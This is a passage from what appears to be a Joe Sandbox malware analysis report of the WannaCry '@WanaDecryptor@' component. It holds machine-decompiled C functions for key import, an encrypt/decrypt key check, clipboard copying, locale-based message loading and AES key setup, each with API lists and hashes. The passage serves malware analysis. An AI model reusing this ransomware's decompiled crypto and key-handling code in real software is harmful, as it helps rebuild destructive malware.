                                                      							} else {
                                                      								while(1) {
                                                      									_push(_t226);
                                                      									_push(_a4);
                                                      									E0040B0C0(_t124);
                                                      									_t100 = _t226;
                                                      									if( *((intOrPtr*)(_t124 + 4)) == 0) {
                                                      										break;
                                                      									}
                                                      									_t217 = 0;
                                                      									if( *(_t124 + 0x3cc) > 0) {
                                                      										_t22 = _t124 - _t226 + 0x3f0; // 0x444
                                                      										_t204 = _t22;
                                                      										do {
                                                      											 *_t100 =  *_t100 ^  *(_t204 + _t100);
                                                      											_t100 =  &(_t100[0]);
                                                      											_t217 = _t217 + 1;
                                                      										} while (_t217 <  *(_t124 + 0x3cc));
                                                      									}
                                                      									_t218 = _v4;
                                                      									_t27 = _t124 + 0x3f0; // 0x444
                                                      									_t152 =  *(_t124 + 0x3cc) >> 2;
                                                      									_t121 = memcpy(_t218 + _t152 + _t152, _t218, memcpy(_t27, _t218, _t152 << 2) & 0x00000003);
                                                      									_t228 = _t228 + 0x18;
                                                      									_t157 =  *(_t124 + 0x3cc);
                                                      									_t102 = _t121 / _t157;
                                                      									_t185 = _v4 + _t157;
                                                      									_t226 = _t226 + _t157;
                                                      									_t206 = _a8 + 1;
                                                      									_v4 = _t185;
                                                      									_a8 = _t206;
                                                      									if(_t206 < _t102) {
                                                      										continue;
                                                      									} else {
                                                      										goto L11;
                                                      									}
                                                      									goto L31;
                                                      								}
                                                      								__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                                      								_t130 =  &_v24;
                                                      								_push(0x41c9c0);
                                                      								_push(_t130);
                                                      								L004130FC();
                                                      								goto L13;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				L31:
                                                      			}
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040b4bf
                                                      0x0040b4d8
                                                      0x0040b4de
                                                      0x0040b4e2
                                                      0x0040b4e7
                                                      0x0040b4e8
                                                      0x00000000
                                                      0x0040b4e8
                                                      0x0040b435
                                                      0x0040b417
                                                      0x0040b40a
                                                      0x00000000

                                                      APIs
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B3D9
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B3E9
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B4D8
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B4E8
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B5A5
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B5B5
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213AC), ref: 0040B60B
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B61B
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??0exception@@ExceptionThrow
                                                      • String ID:
                                                      • API String ID: 941485209-0
                                                      • Opcode ID: 1e9378705d9ba196d58f13d3cc7227803daa0403281f32e8405f41cd2aefe311
                                                      • Instruction ID: 0dbcc5357461fba905cfbac0272349747bc27b8ce320a87ccfe5983878451c5e
                                                      • Opcode Fuzzy Hash: 1e9378705d9ba196d58f13d3cc7227803daa0403281f32e8405f41cd2aefe311
                                                      • Instruction Fuzzy Hash: 7A61D5316043158BC705DE2998919ABB7E6FFC8704F04497EFC89BB345C738AA06CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00407C30(void* __ecx) {
                                                      				int _t9;
                                                      				void* _t15;
                                                      				void* _t22;
                                                      				signed int _t25;
                                                      				signed int _t26;
                                                      				void* _t39;
                                                      				void* _t40;
                                                      
                                                      				_t39 = __ecx;
                                                      				_t9 = OpenClipboard( *(__ecx + 0x20));
                                                      				if(_t9 == 0) {
                                                      					return _t9;
                                                      				} else {
                                                      					_t22 = GlobalAlloc(2,  *((intOrPtr*)( *(_t39 + 0x508) - 8)) + 1);
                                                      					if(_t22 != 0) {
                                                      						EmptyClipboard();
                                                      						_t40 =  *(_t39 + 0x508);
                                                      						_t15 = GlobalLock(_t22);
                                                      						_t25 =  *((intOrPtr*)(_t40 - 8)) + 1;
                                                      						_t26 = _t25 >> 2;
                                                      						memcpy(_t15, _t40, _t26 << 2);
                                                      						memcpy(_t40 + _t26 + _t26, _t40, _t25 & 0x00000003);
                                                      						GlobalUnlock(_t22);
                                                      						SetClipboardData(1, _t22);
                                                      						return CloseClipboard();
                                                      					}
                                                      					return CloseClipboard();
                                                      				}
                                                      			}











                                                      APIs
                                                      • OpenClipboard.USER32(?), ref: 00407C38
                                                      • GlobalAlloc.KERNEL32(00000002,?), ref: 00407C4F
                                                      • CloseClipboard.USER32 ref: 00407C5B
                                                      • EmptyClipboard.USER32 ref: 00407C66
                                                      • GlobalLock.KERNEL32(00000000), ref: 00407C79
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00407C92
                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00407C9B
                                                      • CloseClipboard.USER32 ref: 00407CA1
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Clipboard$Global$Close$AllocDataEmptyLockOpenUnlock
                                                      • String ID:
                                                      • API String ID: 142981918-0
                                                      • Opcode ID: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
                                                      • Instruction ID: 8252ba06fde5d142781bbccc432981ef86be9671d894a3679d09edf034c0945c
                                                      • Opcode Fuzzy Hash: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
                                                      • Instruction Fuzzy Hash: 1D014B71740A05DFD714ABA5EC8DAFBB7A9FB88356B908079F54AC3350CF61AC048B64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 47%
                                                      			E004047C0(intOrPtr __ecx, intOrPtr _a4, signed int _a8) {
                                                      				long* _v8;
                                                      				char _v20;
                                                      				void _v539;
                                                      				char _v540;
                                                      				char _v543;
                                                      				char _v544;
                                                      				intOrPtr _v548;
                                                      				char _v552;
                                                      				int _v556;
                                                      				intOrPtr _v560;
                                                      				void* __ebx;
                                                      				char _t38;
                                                      				void* _t45;
                                                      				void* _t48;
                                                      				intOrPtr _t63;
                                                      				intOrPtr _t67;
                                                      				signed int _t76;
                                                      				unsigned int _t78;
                                                      				signed int _t79;
                                                      				long* _t85;
                                                      				char _t92;
                                                      				void* _t116;
                                                      				intOrPtr _t118;
                                                      				void* _t120;
                                                      				void* _t121;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(0x415e38);
                                                      				_push(0x413050);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t118;
                                                      				_t63 = __ecx;
                                                      				_v560 = __ecx;
                                                      				_t38 = "TESTDATA"; // 0x54534554
                                                      				_v552 = _t38;
                                                      				_t67 =  *0x420c64; // 0x41544144
                                                      				_v548 = _t67;
                                                      				_t92 =  *0x420c68; // 0x0
                                                      				_v544 = _t92;
                                                      				_v543 = 0;
                                                      				_v540 = 0;
                                                      				memset( &_v539, 0, 0x7f << 2);
                                                      				_t120 = _t118 - 0x21c + 0xc;
                                                      				asm("stosw");
                                                      				asm("stosb");
                                                      				asm("repne scasb");
                                                      				_v556 = 0xbadbac;
                                                      				if(E004046B0(_t63) == 0) {
                                                      					L6:
                                                      					 *[fs:0x0] = _v20;
                                                      					return 0;
                                                      				} else {
                                                      					_v8 = 0;
                                                      					_t45 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 8, _a4);
                                                      					_t121 = _t120 + 0xc;
                                                      					if(_t45 == 0) {
                                                      						L12:
                                                      						_push(0xffffffff);
                                                      						_push( &_v20);
                                                      						goto L5;
                                                      					} else {
                                                      						_t76 = _a8;
                                                      						_t48 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 0xc, _t76);
                                                      						_t121 = _t121 + 0xc;
                                                      						if(_t48 == 0) {
                                                      							goto L12;
                                                      						} else {
                                                      							asm("repne scasb");
                                                      							_t78 =  !(_t76 | 0xffffffff);
                                                      							_t116 =  &_v552 - _t78;
                                                      							_t79 = _t78 >> 2;
                                                      							memcpy(_t116 + _t79 + _t79, _t116, memcpy( &_v540, _t116, _t79 << 2) & 0x00000003);
                                                      							_t121 = _t121 + 0x18;
                                                      							_push(0x200);
                                                      							_push( &_v556);
                                                      							_push( &_v540);
                                                      							_push(0);
                                                      							_push(1);
                                                      							_push(0);
                                                      							_push( *((intOrPtr*)(_t63 + 8)));
                                                      							if( *0x4217cc() != 0) {
                                                      								_t85 =  *(_t63 + 0xc);
                                                      								if(CryptDecrypt(_t85, 0, 1, 0,  &_v540,  &_v556) != 0) {
                                                      									asm("repne scasb");
                                                      									if(strncmp( &_v540,  &_v552,  !(_t85 | 0xffffffff) - 1) != 0) {
                                                      										_v8 = 0xffffffff;
                                                      										E004049A6(_t63);
                                                      										goto L6;
                                                      									} else {
                                                      										_push(0xffffffff);
                                                      										_push( &_v20);
                                                      										L00413056();
                                                      										 *[fs:0x0] = _v20;
                                                      										return 1;
                                                      									}
                                                      								} else {
                                                      									_push(0xffffffff);
                                                      									_push( &_v20);
                                                      									goto L5;
                                                      								}
                                                      							} else {
                                                      								_push(0xffffffff);
                                                      								_push( &_v20);
                                                      								L5:
                                                      								L00413056();
                                                      								goto L6;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      			}





























                                                      APIs
                                                        • Part of subcall function 004046B0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD
                                                        • Part of subcall function 004049B0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
                                                        • Part of subcall function 004049B0: GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
                                                        • Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404AC7
                                                      • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200), ref: 004048DB
                                                      • _local_unwind2.MSVCRT ref: 004048EB
                                                      • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?), ref: 00404920
                                                      • strncmp.MSVCRT(00000000,?), ref: 00404951
                                                      • _local_unwind2.MSVCRT ref: 00404964
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Crypt_local_unwind2$File$AcquireContextCreateDecryptEncryptSizestrncmp
                                                      • String ID: TESTDATA
                                                      • API String ID: 154225373-1607903762
                                                      • Opcode ID: 20c9666a7ffcf9d4be304aa18a7e829ae4cc28ed87e3f3fd2989e324c574ec42
                                                      • Instruction ID: 12943b98363484da7d263465f98eb3331ab271d68fc45af0c4cd497e7be75c93
                                                      • Opcode Fuzzy Hash: 20c9666a7ffcf9d4be304aa18a7e829ae4cc28ed87e3f3fd2989e324c574ec42
                                                      • Instruction Fuzzy Hash: 21512DB6600218ABCB24CB64DC45BEBB7B4FB98320F10477DF915A72C1EB749A44CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E004049B0(long* _a4, HCRYPTKEY* _a8, CHAR* _a12) {
                                                      				int _v8;
                                                      				char _v20;
                                                      				long _v32;
                                                      				int _v36;
                                                      				long _v40;
                                                      				void* _v44;
                                                      				long _t24;
                                                      				int _t28;
                                                      				BYTE* _t35;
                                                      				void* _t46;
                                                      				long _t51;
                                                      				intOrPtr _t53;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(0x415e48);
                                                      				_push(0x413050);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t53;
                                                      				_v44 = 0xffffffff;
                                                      				_v32 = 0;
                                                      				_v36 = 0;
                                                      				_v8 = 0;
                                                      				_t46 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
                                                      				_v44 = _t46;
                                                      				if(_t46 == 0xffffffff) {
                                                      					L10:
                                                      					_push(0xffffffff);
                                                      					goto L11;
                                                      				} else {
                                                      					_t24 = GetFileSize(_t46, 0);
                                                      					_t51 = _t24;
                                                      					_v40 = _t51;
                                                      					if(_t51 != 0xffffffff) {
                                                      						if(_t51 <= 0x19000) {
                                                      							_t35 = GlobalAlloc(0, _t51);
                                                      							_v36 = _t35;
                                                      							if(_t35 == 0) {
                                                      								goto L10;
                                                      							} else {
                                                      								if(ReadFile(_t46, _t35, _t51,  &_v32, 0) != 0) {
                                                      									_t28 = CryptImportKey(_a4, _t35, _v32, 0, 0, _a8);
                                                      									_push(0xffffffff);
                                                      									if(_t28 == 0) {
                                                      										L11:
                                                      										_push( &_v20);
                                                      										goto L12;
                                                      									} else {
                                                      										_push( &_v20);
                                                      										L00413056();
                                                      										 *[fs:0x0] = _v20;
                                                      										return 1;
                                                      									}
                                                      								} else {
                                                      									_push(0xffffffff);
                                                      									_push( &_v20);
                                                      									goto L12;
                                                      								}
                                                      							}
                                                      						} else {
                                                      							_push(0xffffffff);
                                                      							_push( &_v20);
                                                      							goto L12;
                                                      						}
                                                      					} else {
                                                      						_push(_t24);
                                                      						_push( &_v20);
                                                      						L12:
                                                      						L00413056();
                                                      						 *[fs:0x0] = _v20;
                                                      						return 0;
                                                      					}
                                                      				}
                                                      			}
















                                                      APIs
                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
                                                      • _local_unwind2.MSVCRT ref: 00404AC7
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CreateSize_local_unwind2
                                                      • String ID:
                                                      • API String ID: 1039228802-0
                                                      • Opcode ID: 90535d59a0f2dbe90f1bf53ea38d3d76a54ffae39caaa8181d17ff2389417ade
                                                      • Instruction ID: 027920ce5e1762b5ae47f20262b5a931ea28e629a989eecbafe96ff87ad0b853
                                                      • Opcode Fuzzy Hash: 90535d59a0f2dbe90f1bf53ea38d3d76a54ffae39caaa8181d17ff2389417ade
                                                      • Instruction Fuzzy Hash: 723153B1A40219BBDB10DF98DC84FFFB6ACE789771F14472AF525A22C0D33859018B68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 85%
                                                      			E00406C20(void* __ecx) {
                                                      				void _v51;
                                                      				void* _v52;
                                                      				signed int _t14;
                                                      				void* _t26;
                                                      				char* _t30;
                                                      				unsigned int _t36;
                                                      				signed int _t37;
                                                      				void* _t55;
                                                      
                                                      				_t26 = __ecx;
                                                      				_v52 = 0;
                                                      				memset( &_v51, 0, 0xc << 2);
                                                      				asm("stosb");
                                                      				_t14 = GetUserDefaultLangID();
                                                      				_t30 =  &_v52;
                                                      				if(GetLocaleInfoA(_t14 & 0x0000ffff, 0x1001, _t30, 0x32) == 0) {
                                                      					asm("repne scasb");
                                                      					_t36 =  !(_t30 | 0xffffffff);
                                                      					_t55 = "English" - _t36;
                                                      					_t37 = _t36 >> 2;
                                                      					memcpy(_t55 + _t37 + _t37, _t55, memcpy( &_v52, _t55, _t37 << 2) & 0x00000003);
                                                      				}
                                                      				if(SendMessageA( *(_t26 + 0x80), 0x158, 0,  &_v52) != 0xffffffff) {
                                                      					SendMessageA( *(_t26 + 0x80), 0x14d, 0,  &_v52);
                                                      					return E00406AE0(_t26);
                                                      				} else {
                                                      					SendMessageA( *(_t26 + 0x80), 0x14e, 0, 0);
                                                      					return E00406AE0(_t26);
                                                      				}
                                                      			}












                                                      APIs
                                                      • GetUserDefaultLangID.KERNEL32 ref: 00406C3B
                                                      • GetLocaleInfoA.KERNEL32(00000000,00001001,00000000,00000032), ref: 00406C53
                                                      • SendMessageA.USER32(?,00000158,00000000,00000000), ref: 00406C9A
                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00406CB1
                                                      • SendMessageA.USER32(?,0000014D,00000000,00000000), ref: 00406CD4
                                                        • Part of subcall function 00406AE0: #540.MFC42(?,767B20C0), ref: 00406B03
                                                        • Part of subcall function 00406AE0: #3874.MFC42 ref: 00406B1B
                                                        • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B29
                                                        • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406B41
                                                        • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406B59
                                                        • Part of subcall function 00406AE0: #800.MFC42(?,?,767B20C0), ref: 00406B62
                                                        • Part of subcall function 00406AE0: #800.MFC42 ref: 00406B73
                                                        • Part of subcall function 00406AE0: GetFileAttributesA.KERNEL32(?), ref: 00406B7D
                                                        • Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B91
                                                        • Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406BA9
                                                        • Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406BBB
                                                        • Part of subcall function 00406AE0: #800.MFC42(?,?,?,?,?,767B20C0), ref: 00406BC4
                                                        • Part of subcall function 00406AE0: #800.MFC42 ref: 00406BD5
                                                        • Part of subcall function 00406AE0: #800.MFC42(?), ref: 00406BF5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$MessageSend$#537#924sprintf$#3874#540AttributesDefaultFileInfoLangLocaleUser
                                                      • String ID: English
                                                      • API String ID: 600832625-3812506524
                                                      • Opcode ID: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
                                                      • Instruction ID: 12cb8a10269d81aa60d086da51d7e65d8080bc449a50ca3d57c6290c1d86febe
                                                      • Opcode Fuzzy Hash: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
                                                      • Instruction Fuzzy Hash: F911D3717402006BEB149634DC42BAB7795EBD4720F54863EFE5AEB2D0D9F8A8098794
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 60%
                                                      			E0040A150(void* __ecx) {
                                                      				void* _t170;
                                                      				void* _t177;
                                                      				unsigned int _t178;
                                                      				intOrPtr _t182;
                                                      				signed int _t189;
                                                      				signed int _t190;
                                                      				signed int _t192;
                                                      				signed int* _t198;
                                                      				signed int* _t203;
                                                      				signed int _t214;
                                                      				signed int* _t215;
                                                      				signed int _t224;
                                                      				void* _t236;
                                                      				unsigned int _t238;
                                                      				signed int _t239;
                                                      				signed int _t245;
                                                      				signed int _t251;
                                                      				void* _t268;
                                                      				void* _t275;
                                                      				signed int _t276;
                                                      				void* _t278;
                                                      				signed int _t290;
                                                      				int _t292;
                                                      				signed int _t293;
                                                      				signed int _t317;
                                                      				signed int _t321;
                                                      				signed int _t337;
                                                      				signed int _t353;
                                                      				signed int _t355;
                                                      				intOrPtr* _t375;
                                                      				signed int _t378;
                                                      				void* _t385;
                                                      				void* _t386;
                                                      				void* _t387;
                                                      				signed int _t388;
                                                      				signed int* _t390;
                                                      				void* _t391;
                                                      				void* _t392;
                                                      				signed int _t395;
                                                      				signed int* _t397;
                                                      				intOrPtr _t398;
                                                      				void* _t399;
                                                      				void* _t403;
                                                      
                                                      				_t236 = __ecx;
                                                      				if( *((intOrPtr*)(_t399 + 4)) == 0) {
                                                      					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
                                                      					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
                                                      					_push(0x41c9c0);
                                                      					_push(_t399 + 8);
                                                      					L004130FC();
                                                      				}
                                                      				_t170 =  *(_t399 + 0x20);
                                                      				if(_t170 != 0x10 && _t170 != 0x18 && _t170 != 0x20) {
                                                      					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
                                                      					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
                                                      					_t170 = _t399 + 8;
                                                      					_push(0x41c9c0);
                                                      					_push(_t170);
                                                      					L004130FC();
                                                      				}
                                                      				_t238 =  *(_t399 + 0x24);
                                                      				if(_t238 != 0x10 && _t238 != 0x18 && _t238 != 0x20) {
                                                      					 *((intOrPtr*)(_t399 + 0x18)) = 0x4213b4;
                                                      					_t238 = _t399 + 0xc;
                                                      					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
                                                      					_push(0x41c9c0);
                                                      					_push(_t399 + 8);
                                                      					L004130FC();
                                                      				}
                                                      				 *(_t236 + 0x3c8) = _t170;
                                                      				 *(_t236 + 0x3cc) = _t238;
                                                      				_t290 = _t238;
                                                      				_t385 =  *(_t399 + 0x20);
                                                      				_t19 = _t236 + 0x3d0; // 0x424
                                                      				_t239 = _t238 >> 2;
                                                      				memcpy(_t19, _t385, _t239 << 2);
                                                      				_t386 = memcpy(_t385 + _t239 + _t239, _t385, _t290 & 0x00000003);
                                                      				_t22 = _t236 + 0x3f0; // 0x444
                                                      				_t245 =  *(_t236 + 0x3cc) >> 2;
                                                      				memcpy(_t386 + _t245 + _t245, _t386, memcpy(_t22, _t386, _t245 << 2) & 0x00000003);
                                                      				_t403 = _t399 + 0x30;
                                                      				_t177 =  *(_t236 + 0x3c8);
                                                      				if(_t177 == 0x10) {
                                                      					_t178 =  *(_t236 + 0x3cc);
                                                      					if(_t178 != 0x10) {
                                                      						asm("sbb eax, eax");
                                                      						_t182 = ( ~(_t178 - 0x18) & 0x00000002) + 0xc;
                                                      					} else {
                                                      						_t182 = 0xa;
                                                      					}
                                                      					 *((intOrPtr*)(_t236 + 0x410)) = _t182;
                                                      				} else {
                                                      					if(_t177 == 0x18) {
                                                      						asm("sbb ecx, ecx");
                                                      						 *((intOrPtr*)(_t236 + 0x410)) = ( ~( *(_t236 + 0x3cc) - 0x20) & 0xfffffffe) + 0xe;
                                                      					} else {
                                                      						 *((intOrPtr*)(_t236 + 0x410)) = 0xe;
                                                      					}
                                                      				}
                                                      				asm("cdq");
                                                      				_t292 = 0;
                                                      				_t251 =  *(_t236 + 0x3cc) + (_t290 & 0x00000003) >> 2;
                                                      				 *(_t403 + 0x2c) = _t251;
                                                      				if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
                                                      					L23:
                                                      					_t293 = 0;
                                                      					if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
                                                      						L28:
                                                      						_t44 = _t236 + 0x414; // 0x468
                                                      						_t387 = _t44;
                                                      						asm("cdq");
                                                      						_t353 = ( *((intOrPtr*)(_t236 + 0x410)) + 1) * _t251;
                                                      						 *(_t403 + 0x30) = _t353;
                                                      						_t189 =  *(_t403 + 0x24);
                                                      						_t395 =  *(_t236 + 0x3c8) + (_t293 & 0x00000003) >> 2;
                                                      						 *(_t403 + 0x10) = _t395;
                                                      						if(_t395 <= 0) {
                                                      							L31:
                                                      							_t388 = 0;
                                                      							if(_t395 <= 0) {
                                                      								L35:
                                                      								if(_t388 >= _t353) {
                                                      									L51:
                                                      									_t190 = 1;
                                                      									 *(_t403 + 0x30) = 1;
                                                      									if( *((intOrPtr*)(_t236 + 0x410)) <= 1) {
                                                      										L58:
                                                      										 *((char*)(_t236 + 4)) = 1;
                                                      										return _t190;
                                                      									}
                                                      									_t151 = _t236 + 0x208; // 0x25c
                                                      									_t397 = _t151;
                                                      									do {
                                                      										if(_t251 <= 0) {
                                                      											goto L57;
                                                      										}
                                                      										_t390 = _t397;
                                                      										_t355 = _t251;
                                                      										do {
                                                      											_t192 =  *_t390;
                                                      											 *(_t403 + 0x24) = _t192;
                                                      											_t390 =  &(_t390[1]);
                                                      											_t355 = _t355 - 1;
                                                      											 *(_t390 - 4) =  *0x004191B0 ^  *0x004195B0 ^  *0x004199B0 ^  *(0x419db0 + (_t192 & 0x000000ff) * 4);
                                                      										} while (_t355 != 0);
                                                      										_t251 =  *(_t403 + 0x2c);
                                                      										L57:
                                                      										_t190 =  *(_t403 + 0x30) + 1;
                                                      										_t397 =  &(_t397[8]);
                                                      										 *(_t403 + 0x30) = _t190;
                                                      									} while (_t190 <  *((intOrPtr*)(_t236 + 0x410)));
                                                      									goto L58;
                                                      								}
                                                      								 *(_t403 + 0x28) = 0x41a1b0;
                                                      								do {
                                                      									 *(_t403 + 0x24) =  *(_t236 + 0x410 + _t395 * 4);
                                                      									 *(_t236 + 0x414) =  *(_t236 + 0x414) ^ ((( *0x00416FB0 ^  *( *(_t403 + 0x28))) << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
                                                      									 *(_t403 + 0x28) =  *(_t403 + 0x28) + 1;
                                                      									if(_t395 == 8) {
                                                      										_t104 = _t236 + 0x418; // 0x46c
                                                      										_t198 = _t104;
                                                      										_t268 = 3;
                                                      										do {
                                                      											 *_t198 =  *_t198 ^  *(_t198 - 4);
                                                      											_t198 =  &(_t198[1]);
                                                      											_t268 = _t268 - 1;
                                                      										} while (_t268 != 0);
                                                      										 *(_t403 + 0x24) =  *(_t236 + 0x420);
                                                      										_t275 = 3;
                                                      										 *(_t236 + 0x424) =  *(_t236 + 0x424) ^ (( *0x00416FB0 << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
                                                      										_t116 = _t236 + 0x428; // 0x47c
                                                      										_t203 = _t116;
                                                      										do {
                                                      											 *_t203 =  *_t203 ^  *(_t203 - 4);
                                                      											_t203 =  &(_t203[1]);
                                                      											_t275 = _t275 - 1;
                                                      										} while (_t275 != 0);
                                                      										L46:
                                                      										 *(_t403 + 0x24) = 0;
                                                      										if(_t395 <= 0) {
                                                      											goto L50;
                                                      										}
                                                      										_t119 = _t236 + 0x414; // 0x468
                                                      										_t375 = _t119;
                                                      										while(1) {
                                                      											_t251 =  *(_t403 + 0x2c);
                                                      											if(_t388 >=  *(_t403 + 0x30)) {
                                                      												goto L51;
                                                      											}
                                                      											_t398 =  *_t375;
                                                      											asm("cdq");
                                                      											_t375 = _t375 + 4;
                                                      											_t276 = _t388 / _t251;
                                                      											asm("cdq");
                                                      											_t317 = _t388 %  *(_t403 + 0x2c);
